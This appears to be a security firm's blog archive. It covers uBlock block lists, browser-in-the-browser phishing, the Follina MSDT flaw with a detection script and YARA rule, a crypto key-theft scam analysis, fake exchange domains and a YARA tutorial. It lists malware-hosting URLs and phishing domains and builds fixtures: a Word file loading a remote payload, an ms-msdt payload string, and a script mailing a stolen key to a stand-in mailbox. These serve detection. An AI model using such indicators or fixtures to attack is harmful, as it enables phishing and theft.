Categories
Alvosec

Block malicious domains by using Alvosec lists for uBlock

uBlock Origin is a free and open-source, cross-platform browser extension for content filtering, primarily aimed at neutralizing privacy invasion in an efficient, user-friendly way.

There are many free lists, used to block advertisements, trackers, malware and annoyances.

We have made three lists that can be imported into the uBlock Origin extension to increase the security of your browser.

The first one (tld) blocks the most abused top-level domains. Use this list only if you know what you are doing and how to deal with whitelisting: it blocks every site under those TLDs, legitimate ones included, so you will need to whitelist the ones you actually use.

Example:

*.party
*.click
*.gdn
*.men
*.study
*.reise

Top Level Domain (TLD) registries which allow registrars to sell high volumes of domains to professional spammers and malware operators in essence aid and abet the plague of abuse on the Internet. Some registrars and resellers knowingly sell high volumes of domains to these actors for profit, and many registries do not do enough to stop or limit this endless supply of domains.

The second one (urlhaus) blocks malicious URLs that are being used for malware distribution.

Example:

http://59.99.199.124:56993/
http://198.23.145.147/223/
http://183.188.4.16:47562/
http://219.157.134.188:45981/

The third list (phishing) blocks all detected phishing websites related to the cryptocurrency world.

Example:

myethervalet.us
solnftgiveaway.net
watchonlywallet.com
roninchain.live
ipencakewsags.org
metmask.me
lmyetherwalletr.com

To add our lists to uBlock Origin, click the extension icon, open the settings (dashboard) and navigate to the Filter lists tab. Once there, click Import and paste our URLs:

Once you open a URL that is found in any of the lists, uBlock Origin will block the page and show a warning telling you to stay away from it:

Each list is updated daily, except tld. There is a small chance of false positives (false warnings) generated by our lists. If you have any questions or suggestions, feel free to contact us via Twitter or email us at info@alvosec.com.
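As an added example (this is not Alvosec's code and the entries are constructed samples, not the live lists), the following Python script shows how each of the three list styles is interpreted when a URL is checked: a tld entry matches any host under that top-level domain, a urlhaus entry is a URL prefix (host, port and path), and a phishing entry matches the domain and all of its subdomains. The allowlist is an assumption; it is the kind of whitelisting the tld list requires.

```python
# Added example (not Alvosec's code): check a URL against entries written in
# the three list styles described above. Entries and allowlist are constructed.
from urllib.parse import urlsplit

TLD_LIST = ["*.party", "*.click", "*.gdn"]                 # blocks whole TLDs
URLHAUS_LIST = ["http://59.99.199.124:56993/",             # URL prefixes
                "http://198.23.145.147/223/"]
PHISHING_LIST = ["metmask.me", "roninchain.live"]          # domains and subdomains
ALLOWLIST = ["legit-site.click"]                           # assumed exemptions


def _split(url):
    """Return (scheme, host, port, path); a bare host is treated as http://host."""
    if "://" not in url:
        url = "http://" + url
    p = urlsplit(url)
    host = (p.hostname or "").rstrip(".").lower()
    return p.scheme.lower(), host, p.port, (p.path or "/")


def _canon(url):
    """Canonical form used for prefix comparison: scheme://host[:port]/path."""
    scheme, host, port, path = _split(url)
    netloc = host if port is None else f"{host}:{port}"
    return f"{scheme}://{netloc}{path}"


def _host_in(host, domain):
    """True when host is the domain itself or any subdomain of it."""
    return host == domain or host.endswith("." + domain)


def check_url(url, tld=TLD_LIST, urlhaus=URLHAUS_LIST,
              phishing=PHISHING_LIST, allow=ALLOWLIST):
    """Return a list of (list_name, matching_entry); an empty list means no hit.

    Allowlisted hosts are exempt from every list. That is what whitelisting
    means for the tld list: it blocks legitimate sites under the TLD too.
    """
    _, host, _, _ = _split(url)
    if any(_host_in(host, a.lower()) for a in allow):
        return []
    hits = []
    for entry in tld:                       # "*.click" -> host ends with ".click"
        if entry.startswith("*.") and host.endswith(entry[1:].lower()):
            hits.append(("tld", entry))
    canon = _canon(url)
    for entry in urlhaus:                   # prefix match on the canonical URL
        if canon.startswith(_canon(entry)):
            hits.append(("urlhaus", entry))
    for entry in phishing:                  # domain or any subdomain
        if _host_in(host, entry.lower()):
            hits.append(("phishing", entry))
    return hits


if __name__ == "__main__":
    for u in ["http://login.metmask.me/wallet", "https://win-prize.click/claim",
              "http://59.99.199.124:56993/setup.exe", "https://legit-site.click/",
              "http://198.23.145.147/", "example.com"]:
        print(u, "->", check_url(u) or "clean")
```

Note that a urlhaus entry such as http://198.23.145.147/223/ does not match http://198.23.145.147/ itself: only the listed path prefix is blocked, which is why that list produces few false positives while the tld list produces many.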


Browser In The Browser (BITB) Attack

A novel phishing technique called the browser-in-the-browser (BitB) attack can be used to simulate a browser window within the browser in order to spoof a legitimate domain, making it possible to stage convincing phishing attacks.

According to the penetration tester and security researcher who goes by the handle mrd0x on Twitter, the method takes advantage of third-party single sign-on (SSO) options embedded on websites, such as “Sign in with Google” (or Facebook, Apple, or Microsoft).

While the default behavior when a user attempts to sign in via these methods is to be greeted by a pop-up window to complete the authentication process, the BitB attack replicates this entire process using a mix of HTML and CSS code to create an entirely fabricated browser window. (The Hacker News)

DEMO

Pop-Up Login Windows

Quite often, when we authenticate to a website via Google, Microsoft, Apple, etc., we are presented with a pop-up window that asks us to authenticate. The image below shows the window that appears when someone attempts to log in to Canva using their Google account.

Replicating The Window

Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and it is basically indistinguishable. The image below shows the fake window compared with the real window. Very few people would notice the slight differences between the two.

We have made an example phishing website for webauth.com, just for the sake of learning. What you see is a fake pop-up window made in HTML/CSS; from that point an attacker can make the displayed URL look legitimate and deceive the victim into logging in.

Real login windows are browser windows, and they act that way: you can maximize and minimize them and move them anywhere on the screen. Fake pop-ups are bound to the page where they are located. They can also move freely and cover buttons and images, but only inside their boundaries, that is, within the browser window. They cannot go outside it. That difference should help you spot them: try to drag the pop-up past the edge of the browser window, and if it stops at the edge, it is part of the page. The padlock and address in a fake pop-up are also just rendered text, so clicking them will not show the certificate details a real address bar would.


CVE-2022-30190: Microsoft Support Diagnostic Tool (MSDT) RCE Vulnerability “Follina”

Description

A vulnerability has been discovered in the Microsoft Support Diagnostic Tool (MSDT) which could allow arbitrary code execution. MSDT can be called through its URL protocol (ms-msdt:) from a calling application such as Word, allowing an attacker to run arbitrary code with the privileges of the user who opened the document. An attacker can entice a victim to open a malicious Word document, resulting in code execution without macros being enabled. The attacker can then install programs; view, change, or delete data; or create new accounts in the context allowed by the user’s rights.

Follina PoC (Proof of concept)

The attack pattern would be as follows:

Targeted systems

This vulnerability affects Windows 7, 10 and 11 and Windows Server 2008 through 2022, both 32-bit and 64-bit, regardless of the system language.
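The following script is an added example, not code from Alvosec or Microsoft. A .docx file is a zip archive, and the Follina documents seen in the wild reached MSDT through a relationship in word/_rels/document.xml.rels whose Type is oleObject and whose Target is an external http(s) URL, so the HTML that launches ms-msdt: is fetched when the document is opened. The script lists every external relationship in a document and reports external OLE objects. The sample document is built in memory and the URL is a documentation address, not a real indicator.

```python
# Added example, not Alvosec's or Microsoft's code: flag a .docx whose
# relationships pull an OLE object from an external URL, the delivery path used
# by Follina documents. The sample document is constructed in memory.
import io
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"


def external_relationships(docx_bytes):
    """Return (rels_file, Id, Type, Target) for every TargetMode="External" relationship."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "").lower() == "external":
                    found.append((name, rel.get("Id"), rel.get("Type", ""), rel.get("Target", "")))
    return found


def follina_indicators(docx_bytes):
    """Human-readable findings; an empty list means nothing suspicious was seen.

    Ordinary hyperlinks are external relationships too, so only OLE objects
    loaded over http(s) are reported. Such a target is rare in benign documents
    and worth a look even when the URL no longer answers.
    """
    findings = []
    for rels_file, rid, rtype, target in external_relationships(docx_bytes):
        if rtype == OLE_REL and target.lower().startswith(("http://", "https://")):
            findings.append(f"{rels_file}: oleObject {rid} loads {target}")
    return findings


def build_sample_docx(external_target=None):
    """Constructed minimal .docx; external_target adds an external oleObject relationship."""
    rels = ['<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/'
            'officeDocument/2006/relationships/styles" Target="styles.xml"/>']
    if external_target:
        rels.append(f'<Relationship Id="rId9" Type="{OLE_REL}" '
                    f'Target="{external_target}" TargetMode="External"/>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels",
                   f'<Relationships xmlns="{RELS_NS}">' + "".join(rels) + "</Relationships>")
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx("http://198.51.100.7/payload.html")
    print(follina_indicators(sample) or "clean")
```

This only covers the .docx delivery; the same ms-msdt: URI can be reached from other containers (RTF files were also used), so pair it with the YARA rule below, which looks at the payload strings rather than the container.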

Workarounds

To disable the MSDT URL Protocol

Disabling the MSDT URL protocol prevents troubleshooters from being launched as links, including links throughout the operating system. Troubleshooters can still be accessed using the Get Help application and in system settings as other or additional troubleshooters. Microsoft fixed the vulnerability in the June 14, 2022 security updates; the workaround is for systems that cannot install them yet. Follow these steps to disable it:

  1. Run Command Prompt as Administrator.
  2. To back up the registry key, execute the command "reg export HKEY_CLASSES_ROOT\ms-msdt filename".
  3. Execute the command "reg delete HKEY_CLASSES_ROOT\ms-msdt /f".

How to undo the workaround

  1. Run Command Prompt as Administrator.
  2. To restore the registry key, execute the command "reg import filename".

YARA rule to detect it

rule Follina_CVE_2022_30190
{
    meta:
        author = "Joe Security"
        reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
    strings:
        $msdt1 = "ms-msdt:/id" ascii wide nocase
        $msdt2 = "ms-msdt:-id" ascii wide nocase
        $para1 = "IT_RebrowseForFile" ascii wide nocase
    condition:
        (1 of ($msdt*) and 1 of ($para*))
}

Note the wildcards in the condition: $msdt* and $para* refer to every string whose name starts with that prefix. Without the asterisk YARA refuses to compile the rule, because no strings named $msdt or $para exist.

References:

CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30190
Microsoft: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190
Microsoft: https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
PCMag: https://www.pcmag.com/news/researchers-reveal-follina-zero-day-vulnerability-in-microsoft-office


Exposed! How scammers steal crypto private keys?

The rise in popularity of cryptocurrencies has encouraged cybercriminals to find innovative ways to attack markets, users and any structure where cryptocurrencies are stored. In simple words, if an attacker is able to exploit some area of a chain, smart contract or exchange, or illegitimately withdraw cryptocurrency, it is deemed a hack or theft. Scammers around the world took home a record $14 billion in cryptocurrency in 2021.

During our research into crypto scams we have seen that the methods of these scammers are getting more and more sophisticated, which is why we advise all users to be extra cautious when they engage with anything unusual or unverified.

Let’s dig into the story…

We found a website that was targeting crypto users with phishing tactics. First we checked the source code of the website and found that most of the page had been mirrored using HTTrack. (HTTrack is an easy-to-use website mirroring utility; it leaves a “Mirrored from …” comment at the top of every copied page.) That is the first sign that the website is suspicious.

Fraudulent websites often display linked social profiles, but in reality the href attribute is empty and does not point to any social media account. That is the second sign that you are browsing a suspicious website.

While exploring the source code, we found a WalletConnect script that called the eth_sendTransaction method.

Here is the code that was used to perform an unauthorized transaction to that ETH address:

In further analysis we detected an unusual script, smtp.js, which is often used to talk to mail servers directly from the browser.

There was another script, sendmail.js, where we found the credentials used to authenticate to the scammer’s mailbox.

So basically, whenever a user scanned the QR code on this phishing website, it checked their ETH balance and tried to perform a transaction; if that failed, the script grabbed the private key and sent it to the scammer’s mailbox.

Here is the script that revealed all of the scammer’s SMTP information, which was used to send stolen private keys to their Gmail account:
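As an added example (this is neither the scam site's code nor Alvosec's), the script below turns the four signs described above into a static triage pass over a site's saved files: the HTTrack mirror comment, social-profile links with an empty href, a WalletConnect eth_sendTransaction call, and browser-side SMTP code with hard-coded mailbox credentials. The regexes are constructed heuristics, the sample site is constructed for this example, and the Email.send and SecureToken names are an assumption about the shape of the smtp.js library's API.

```python
# Added example (not the scam site's code, not Alvosec's): static triage of a
# site's files for the four signs in the article. Heuristics and sample site
# are constructed; Email.send / SecureToken are assumed smtp.js API names.
import re

INDICATORS = {
    "httrack_mirror": re.compile(r"Mirrored from .+ by HTTrack Website Copier", re.I),
    "walletconnect_send_tx": re.compile(r"\beth_sendTransaction\b"),
    "browser_smtp": re.compile(r"smtp\.js|Email\.send\s*\(|SecureToken|smtp\.gmail\.com", re.I),
    "hardcoded_mail_creds": re.compile(r"""(Username|Password)\s*:\s*['"][^'"]+['"]""", re.I),
}
SOCIAL_WORDS = ("twitter", "facebook", "telegram", "discord", "instagram", "t.me")
ANCHOR = re.compile(r"<a\b([^>]*)>(.*?)</a>", re.I | re.S)
HREF = re.compile(r"""href\s*=\s*['"]([^'"]*)['"]""", re.I)


def dead_social_links(html):
    """hrefs of anchors that look like social-profile links but go nowhere."""
    dead = []
    for attrs, inner in ANCHOR.findall(html):
        # the social hint may sit in a class, title, icon or link text
        if not any(w in (attrs + inner).lower() for w in SOCIAL_WORDS):
            continue
        m = HREF.search(attrs)
        href = m.group(1).strip() if m else ""
        if href in ("", "#") or href.lower().startswith("javascript:"):
            dead.append(href)
    return dead


def triage(files):
    """files: {name: text}. Returns {indicator: [file, ...]} for every indicator that fired."""
    report = {}
    for name, text in sorted(files.items()):
        for label, rx in INDICATORS.items():
            if rx.search(text):
                report.setdefault(label, []).append(name)
        if name.endswith(".html") and dead_social_links(text):
            report.setdefault("dead_social_links", []).append(name)
    return report


# Constructed sample mirroring the article's findings (.invalid hosts, fake creds).
SAMPLE_SITE = {
    "index.html": """<!-- Mirrored from wallet.example.invalid/ by HTTrack Website Copier/3.x -->
<html><body>
<a href="#" class="social twitter">Twitter</a>
<a href="" class="social"><i class="fa fa-telegram"></i></a>
<a href="https://example.invalid/docs">Docs</a>
<script src="smtp.js"></script><script src="sendmail.js"></script>
</body></html>""",
    "app.js": 'connector.sendCustomRequest({ method: "eth_sendTransaction", params: [tx] });',
    "sendmail.js": 'Email.send({ Host: "smtp.gmail.com", Username: "scammer@example.invalid", '
                   'Password: "hunter2", To: "scammer@example.invalid", Subject: "key", Body: key });',
}

if __name__ == "__main__":
    for label, names in triage(SAMPLE_SITE).items():
        print(f"{label}: {', '.join(names)}")
```

Run it over a directory saved with HTTrack or "Save page as, complete"; one indicator alone (a mirrored page, a WalletConnect call) is normal on plenty of sites, but mail credentials sitting in client-side JavaScript next to a key-collecting form are not.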

We are still in the process of recovering the stolen funds; meanwhile we will publish any additional information we find from affected users.

While performing research like this, we often come across sensitive data, which we handle with caution. We also never take any funds from third parties. Make sure to read our privacy policy.


Discovering the chain of fake crypto exchanges

2022 is the year of cryptocurrency and blockchain, as more and more people are interested in getting involved in different aspects of this new technology. While most of us are still exploring how it works, scammers have already found a million ways to make a profit, by creating fake cryptocurrency trading websites and fake crypto wallet apps.

In this article we want to show how we discovered a chain of fake crypto exchanges and how they work, in order to keep you away from them.

How fake crypto websites work

Scammers create fake cryptocurrency trading platforms or fake versions of official crypto wallets to exploit victims. These fake sites tend to have domain names similar to, but slightly different from, the legitimate ones, sometimes making it hard for users to tell them apart. What is worse, some of these copycat websites even appear very high in search results and look exceptionally similar to the real versions. Scammers have also recently started to use Google Ads to promote their fake websites, placing them above the legitimate site in search results.

How they look and what they offer

One of our users (LukeVeK) from the Proton community reported that someone had tried to scam him. Here is what he said:

So basically they will tell you that you have a certain amount of BTC, but the moment you try to withdraw it, the site will ask you to cover a fee, or tell you that the withdrawal balance is below the minimum and that you have to deposit 0.15 BTC.

Here is a list of all the fake websites discovered:

  • mon-bit[.]com
  • goldybit[.]com
  • bit-local[.]com
  • mount-trade[.]com
  • rhinocrypt[.]com
  • bit-trade[.]com
  • bit-grate[.]com
  • mount-traiding[.]com
  • waffebtc[.]com
  • earthxcoin[.]com
  • fastxbit[.]com
  • loop-coin[.]com
  • xeratrade[.]com
  • trade-wall[.]com
  • tiger-bit[.]com
  • second-wallet[.]com
  • bit-well[.]com
  • ebalbit[.]com

Do not open these websites unless you are an experienced security researcher analyzing them in a secure environment.

All of the websites look the same, except for the logo and domain name:

Sometimes these scam websites will even let you withdraw a small amount of money at first. After you have made your first deposits and seen a handful of seemingly successful investments, the site seems perfectly legitimate.

However, as you watch your investments continue to grow, you will feel encouraged to invest more money. That is when the scammers spring the trap. When you want to withdraw your earnings, the website either shuts down or declines the request. If you contact “customer service” for help, the scammers might even ask you to send more deposit money. Of course, you will not get back even one cent.


How to use YARA rules to identify malware

YARA is an open-source tool designed to help malware researchers identify and classify malware samples. It makes it possible to create descriptions (or rules) for malware families based on textual and/or binary patterns. YARA is multi-platform, running on Linux, Windows and Mac OS X. It can be used through its command-line interface or from Python scripts with the YARA-Python extension.

Let’s see an example:

rule silent_banker : banker
{
    meta:
        description = "This is just an example"
        thread_level = 3
        in_the_wild = true

    strings:
        $a = {6A 40 68 00 30 00 00 6A 14 8D 91}
        $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9}
        $c = "UVODFRYSIHLNWPEJXQZAKCBGMT"

    condition:
        $a or $b or $c
}

The above rule tells YARA that any file containing one of the three strings must be reported as silent_banker. This is just a simple example; more complex and powerful rules can be created using wildcards, case-insensitive strings, regular expressions, special operators and many other features, which you will find explained in YARA’s documentation.
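The following is an added example and not YARA itself: a small matcher that shows what the strings section of a rule turns into. Hex strings (including ?? wildcards and [n-m] jumps) and text strings with the ascii, wide and nocase modifiers become byte regexes, and the condition is evaluated over the set of strings that matched. It reuses the strings of the silent_banker rule above and of the Follina rule earlier on this page, so it also shows why that rule needs both "ascii wide" (the ms-msdt: URI can sit in a UTF-16 document as well as in plain HTML) and "nocase". The sample buffers are constructed; nibble wildcards such as 6? are not handled.

```python
# Added example, not YARA: a toy evaluator for the string kinds and modifiers
# used in the rules on this page. Sample buffers are constructed.
import re


def hex_string(body):
    """'6A 40 ?? 00 [2-4] 8D' -> compiled bytes regex (?? wildcard, [n-m] jump)."""
    pattern = b""
    for tok in body.split():
        if tok == "??":
            pattern += b"."
        elif tok.startswith("[") and tok.endswith("]"):
            lo, _, hi = tok[1:-1].partition("-")
            pattern += b".{%d,%d}" % (int(lo), int(hi or lo))
        else:
            pattern += re.escape(bytes.fromhex(tok))
    return re.compile(pattern, re.DOTALL)   # DOTALL so '.' also matches 0x0A


def text_string(text, plain=True, wide=False, nocase=False):
    """A text string can match as ASCII ('ascii'), as UTF-16LE ('wide'), or both."""
    flags = re.IGNORECASE if nocase else 0
    regs = []
    if plain:
        regs.append(re.compile(re.escape(text.encode("ascii")), flags))
    if wide:
        regs.append(re.compile(re.escape(text.encode("utf-16-le")), flags))
    return regs


SILENT_BANKER = {
    "$a": [hex_string("6A 40 68 00 30 00 00 6A 14 8D 91")],
    "$b": [hex_string("8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9")],
    "$c": text_string("UVODFRYSIHLNWPEJXQZAKCBGMT"),
}
FOLLINA = {
    "$msdt1": text_string("ms-msdt:/id", wide=True, nocase=True),
    "$msdt2": text_string("ms-msdt:-id", wide=True, nocase=True),
    "$para1": text_string("IT_RebrowseForFile", wide=True, nocase=True),
}


def matched(strings, data):
    """Names of the rule strings that occur anywhere in data."""
    return {name for name, regs in strings.items() if any(r.search(data) for r in regs)}


def n_of(n, names, prefix):
    """YARA's 'n of ($prefix*)'."""
    return sum(1 for s in names if s.startswith(prefix)) >= n


def scan_silent_banker(data):
    return bool(matched(SILENT_BANKER, data))           # condition: $a or $b or $c


def scan_follina(data):
    hits = matched(FOLLINA, data)                        # 1 of ($msdt*) and 1 of ($para*)
    return n_of(1, hits, "$msdt") and n_of(1, hits, "$para")


if __name__ == "__main__":
    payload = "ms-msdt:/id PCWDiagnostic /param IT_RebrowseForFile=x".encode("utf-16-le")
    print("follina (wide):", scan_follina(payload))
    print("silent_banker:", scan_silent_banker(b"xxUVODFRYSIHLNWPEJXQZAKCBGMTxx"))
```

Real YARA does the same work far faster with an Aho-Corasick prefilter, but the mapping is the one shown: a hex string is a literal byte sequence with gaps, and each modifier adds another encoding of the same text to look for.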

Here is an example of how to use YARA in practice, scanning a directory recursively with one rule file:

yara -r rule.yar /home/linux/suspicious_files/

If you want to scan with multiple rule files, let find run yara once per rule (this also copes with file names containing spaces, which a for loop over the output of find does not):

find ~/yara-rules/rules/ -type f -name '*.yar' -exec yara -r {} /home/linux/suspicious_files/ \;

Make sure to check our GitHub repository, where we have added some of our rules.